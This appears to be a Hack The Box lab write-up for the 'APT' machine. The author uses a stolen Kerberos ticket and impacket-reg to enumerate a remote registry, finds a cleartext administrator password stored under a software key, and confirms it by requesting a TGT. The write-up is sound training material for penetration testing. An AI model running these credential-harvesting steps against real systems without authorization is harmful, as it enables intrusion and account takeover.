InfoSec LAB

APT_Remote_Registry_Read

Created: 5 min read

Remote Registry Read

Using the TGT of the henry.vinson user, I can attempt to enumerate the registry hive of the target system

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKLM\' 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
[-] dcerpc runtime error: code: 0x5 - rpc_s_access_denied

i am unable to access the root key, hklm, likely due to the lack of privileges

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\'  
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\
HKU\\Console
HKU\\Control Panel
HKU\\Environment
HKU\\Keyboard Layout
HKU\\Network
HKU\\Software
HKU\\System
HKU\\Volatile Environment

However, I can access the HKU root key I will skip those irrelevant sub-keys and get to the rest

HKU\Environment

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Environment'                                                        
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Environment
	Path	REG_EXPAND_SZ	 %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
	TEMP	REG_EXPAND_SZ	 %USERPROFILE%\AppData\Local\Temp
	TMP	REG_EXPAND_SZ	 %USERPROFILE%\AppData\Local\Temp

This is the environment variable for the current user It doesn’t seem to contain much

HKU\Network

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Network'    
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Network

The sub-key is empty

HKU\Software

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software'  
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software
HKU\Software\GiganticHostingManagementSystem
HKU\Software\Microsoft
HKU\Software\Policies
HKU\Software\RegisteredApplications
HKU\Software\Sysinternals
HKU\Software\VMware, Inc.
HKU\Software\Wow6432Node
HKU\Software\Classes

Interestingly, the HKU\Software sub-key contains a familiar term, GiganticHostingManagementSystem This must be rather relevant as the target web server is hosting a web application called, Gigantic Hosting

HKU\Software\GiganticHostingManagementSystem

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\GiganticHostingManagementSystem'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\GiganticHostingManagementSystem
	UserName	REG_SZ	 henry.vinson_adm
	PassWord	REG_SZ	 G1#Ny5@2dvht

There is a CLEARTEXT credential for the henry.vinson user, hard-coded into the registry value; G1#Ny5@2dvht The credential requires a validation

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ impacket-getTGT htb.local/henry.vinson_adm@apt.htb.local -dc-ip $IPv6
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: G1#Ny5@2dvht
[*] Saving ticket in henry.vinson_adm@apt.htb.local.ccache

Validated TGT generated for the henry.vinson_adm user

HKU\Software\Microsoft

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\Microsoft'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\Microsoft
HKU\Software\Microsoft\Active Setup
HKU\Software\Microsoft\Command Processor
HKU\Software\Microsoft\CTF
HKU\Software\Microsoft\EventSystem
HKU\Software\Microsoft\FTP
HKU\Software\Microsoft\Internet Explorer
HKU\Software\Microsoft\Notepad
HKU\Software\Microsoft\Speech
HKU\Software\Microsoft\Speech Virtual
HKU\Software\Microsoft\Speech_OneCore
HKU\Software\Microsoft\SystemCertificates
HKU\Software\Microsoft\Windows
HKU\Software\Microsoft\Windows NT
HKU\Software\Microsoft\Windows Script Host
HKU\Software\Microsoft\Wisp

The HKU\Software\Microsoft sub-key contains an additional set of sub-keys within Yet, none of them seem standing out

`HKU\Software\Policies

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\Policies' 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\Policies
HKU\Software\Policies\Microsoft

Another sub-key at HKU\Software\Policies\Microsoft

HKU\Software\Policies\Microsoft

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\Policies\Microsoft'
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\Policies\Microsoft
HKU\Software\Policies\Microsoft\SystemCertificates
HKU\Software\Policies\Microsoft\Windows

Not much here

HKU\Software\RegisteredApplications

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\RegisteredApplications'    
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\RegisteredApplications

Empty

HKU\Software\Classes

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\Classes'    
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\Classes
HKU\Software\Classes\Local Settings
                                                                                                                                        
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\Classes\Local Settings'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\Classes\Local Settings
HKU\Software\Classes\Local Settings\MuiCache
HKU\Software\Classes\Local Settings\Software
 
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\Classes\Local Settings\Software'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\Classes\Local Settings\Software
HKU\Software\Classes\Local Settings\Software\Microsoft
 
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\Classes\Local Settings\Software\Microsoft'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\Classes\Local Settings\Software\Microsoft
HKU\Software\Classes\Local Settings\Software\Microsoft\Windows
 
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Software\Classes\Local Settings\Software\Microsoft\Windows'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\Classes\Local Settings\Software\Microsoft\Windows
HKU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell

These are all default setup

HKU\System

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\System'                                                    
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\System
HKU\System\CurrentControlSet

HKU\System\CurrentControlSet

HKU\System\CurrentControlSet

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\System\CurrentControlSet'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\System\CurrentControlSet
HKU\System\CurrentControlSet\Policies

HKU\System\CurrentControlSet\Policies

HKU\System\CurrentControlSet\Policies

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\System\CurrentControlSet\Policies'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\System\CurrentControlSet\Policies

Empty

HKU\Volatile Environment

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Volatile Environment'             
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Volatile Environment
	LOGONSERVER	REG_SZ	 \\APT
	USERDNSDOMAIN	REG_SZ	 HTB.LOCAL
	USERDOMAIN	REG_SZ	 HTB
	USERNAME	REG_SZ	 henry.vinson
	userprofile	reg_sz	 c:\Users\henry.vinson
	HOMEPATH	REG_SZ	 \Users\henry.vinson
	homedrive	reg_sz	 c:
	appdata	reg_sz	 c:\Users\henry.vinson\AppData\Roaming
	localappdata	reg_sz	 c:\Users\henry.vinson\AppData\Local
	USERDOMAIN_ROAMINGPROFILE	REG_SZ	 HTB
HKU\Volatile Environment\1

Another set of environment variables

HKU\Volatile Environment\1

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-reg htb.local/@apt.htb.local -k -no-pass -dc-ip $IPv6 query -keyName 'HKU\Volatile Environment\1'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Volatile Environment\1
	SESSIONNAME	REG_SZ	 Console
	CLIENTNAME	REG_SZ

Rather irrelevant

Interactive Graph View

Backlinks